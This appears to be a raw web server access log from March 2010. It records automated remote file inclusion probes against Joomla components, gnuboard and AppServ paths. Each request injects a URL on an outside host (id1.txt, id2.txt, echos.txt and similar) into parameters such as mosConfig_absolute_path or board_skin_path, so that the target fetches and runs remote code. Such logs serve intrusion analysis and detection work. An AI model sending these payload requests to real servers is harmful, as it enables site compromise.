61.111.3.35 - - [01/Mar/2010:08:55:36 -0800] "GET /logs//login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:56:06 -0800] "GET /logs/access_100219.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:56:19 -0800] "GET /logs//login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:56:19 -0800] "GET /logs/access_100201.log%20%20//login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:56:19 -0800] "GET /login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:56:45 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:56:56 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:56:58 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:56:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:57:00 -0800] "GET /errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:57:01 -0800] "GET /logs//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:57:14 -0800] "GET /logs/access_100119.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:57:15 -0800] "GET /logs/access_100118.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:57:18 -0800] "GET /logs//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:08:57:22 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:57:51 -0800] "GET /logs/access.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:58:02 -0800] "GET /logs/access_100217.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:58:04 -0800] "GET /logs/access_100214.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:58:04 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:58:04 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:58:08 -0800] "GET /logs/access_100214.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:58:08 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:58:08 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:08:58:15 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:58:54 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:08:59:28 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.812" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:08:59:54 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:09:00:28 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:09:01:00 -0800] "GET /logs/access_100211.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:01:09 -0800] "GET /logs/access_100214.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:01:09 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:01:10 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:01:23 -0800] "GET /logs/access_100214.log///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:01:28 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:09:01:28 -0800] "GET /logs/access_100211.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:01:41 -0800] "GET /include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:01:41 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:01:41 -0800] "GET /logs/access_100217.log//include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:09:02:12 -0800] "GET /logs/access_100118.log%20//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:02:16 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:02:17 -0800] "GET /logs/access_100217.log%20%20//include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:02:17 -0800] "GET /include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:09:02:44 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:02:47 -0800] "GET /logs/access_100214.log///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:09:02:49 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:02:54 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:02:55 -0800] "GET /logs/access_100208.log%20%20//bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:02:59 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:03:04 -0800] "GET /logs/access_100214.log///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:09:03:11 -0800] "GET /logs/access_100214.log///?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:09:03:12 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:09:03:12 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:09:03:12 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:09:03:12 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.812" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:09:03:18 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 4948 "-" "libwww-perl/5.812" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:09:03:51 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:03:59 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:03:59 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:04:04 -0800] "GET /logs/access_100208.log%20%20//bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:09:04:12 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:04:36 -0800] "GET /include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:04:36 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:09:04:36 -0800] "GET /logs/access_100217.log//include/prodler.class.php?sPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:09:04:40 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [01/Mar/2010:09:04:41 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:05:10 -0800] "GET /logs/access_100202.log%20%20//bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:05:11 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:05:11 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:05:11 -0800] "GET /logs/access_100205.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:05:16 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:05:16 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:05:16 -0800] "GET /logs/access_100205.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:05:33 -0800] "GET /logs/access_100203.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:05:36 -0800] "GET /logs/access_100203.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.108.64.216 - - [01/Mar/2010:09:05:45 -0800] "GET /errors.php?error=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:09:05:55 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:09:05:55 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:09:05:55 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:09:06:04 -0800] "GET /logs/access_100202.log%20%20//bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:09:06:24 -0800] "GET /logs/access_100214.log///?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:09:06:26 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:09:06:26 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 4948 "-" "libwww-perl/5.805" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:09:06:40 -0800] "GET /board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:09:06:40 -0800] "GET /logs//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:09:06:43 -0800] "GET /logs/access_100125.log%20%20//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.131.66.198 - - [01/Mar/2010:09:07:14 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://www.lovebyday.com/zip/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:08:05 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:08:05 -0800] "GET /logs/access_100213.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:08:05 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:06 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:06 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:06 -0800] "GET /logs/access_100213.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:08:09 -0800] "GET /logs/access_100218.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:11 -0800] "GET /logs/access_100213.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:11 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:11 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:13 -0800] "GET /logs/access_100218.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:16 -0800] "GET /logs/access_100218.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:24 -0800] "GET /logs/access_100214.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:09:08:25 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:08:45 -0800] "GET /logs/access_100213.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:08:45 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:08:45 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:08:46 -0800] "GET /logs/access_100218.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:09:01 -0800] "GET /logs///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:09:01 -0800] "GET /logs/access_100205.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:09:01 -0800] "GET //gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:09:07 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:09:07 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:09:07 -0800] "GET /logs/access_100213.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:09:11 -0800] "GET /logs/access_100218.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:09:09:22 -0800] "GET /logs/access_100203.log%20%20///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:10:22 -0800] "GET /logs/access_100124.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:10:22 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:10:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:10:22 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:10:37 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:10:37 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:10:37 -0800] "GET /logs/access_100124.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:09:10:37 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
